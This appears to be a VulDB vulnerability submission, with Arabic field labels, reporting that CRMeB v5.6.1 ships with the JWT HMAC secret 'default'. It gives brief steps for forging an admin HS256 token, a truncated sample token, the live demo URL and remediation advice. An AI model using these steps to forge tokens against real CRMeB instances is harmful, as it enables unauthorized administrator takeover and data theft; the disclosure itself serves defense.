| عنوان | CRMeB v5.6.1 Use of hard-coded / weak cryptographic key (CWE-321 / CWE-798) — |
|---|
| الوصف | CRMeB ships with a weak, predictable default JWT HMAC secret value set to "default". The official demo instance (v5.crmeb.net) and fresh deployments use the same default secret. Because the HMAC secret is known/predictable, an attacker can sign arbitrary HS256 JWTs that the server will accept. This allows forging tokens that impersonate any user (including administrators), resulting in authentication bypass, privilege escalation (administrator takeover), and unauthorized access to protected APIs and sensitive business data.
Reproduction (concise)
1. Obtain a JWT issued by the CRMeB demo or deploy a fresh CRMeB instance.
2. Confirm iss claim (e.g., v5.crmeb.net) in the token payload.
3. Use the known secret "default" to sign an HS256 JWT with elevated claims (for example, {"jti":{"id":5,"type":"admin"}}).
4. Send the forged token in Authorization: Bearer <forged_jwt> to protected/admin endpoints — the server accepts the token and grants access.
Evidence
• Observed JWT from demo: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9....V3jebfZZJPpfLBT0TTu53rxSZfaNB4U-zusdikcJSFk (full token available).
• Recovered HMAC secret: default.
• iss claim points to v5.crmeb.net, confirming demo origin.
Impact
• Authentication bypass (any account impersonation)
• Privilege escalation / administrator takeover
• Unauthorized access and potential data exfiltration
Suggested remediation (short)
• Remove hard-coded/weak default secrets. Generate a strong random JWT secret at install time and require administrators to set/rotate it.
• Invalidate tokens signed with the default secret and add documentation/warnings about secret management.
Official demonstration website address: https://v5.crmeb.net/admin/login?redirect=%2Fadmin%2Findex |
|---|
| المستخدم | BlackSpdier (UID 89912) |
|---|
| ارسال | 22/09/2025 11:01 AM (7 أشهر منذ) |
|---|
| الاعتدال | 04/10/2025 08:31 PM (12 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 327171 [CRMEB حتى 5.6.1 JWT HMAC Secret secret تشفير ضعيف] |
|---|
| النقاط | 17 |
|---|